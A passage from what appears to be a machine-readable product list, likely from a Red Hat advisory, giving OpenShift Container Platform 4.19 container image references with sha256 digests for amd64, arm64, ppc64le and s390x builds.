"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
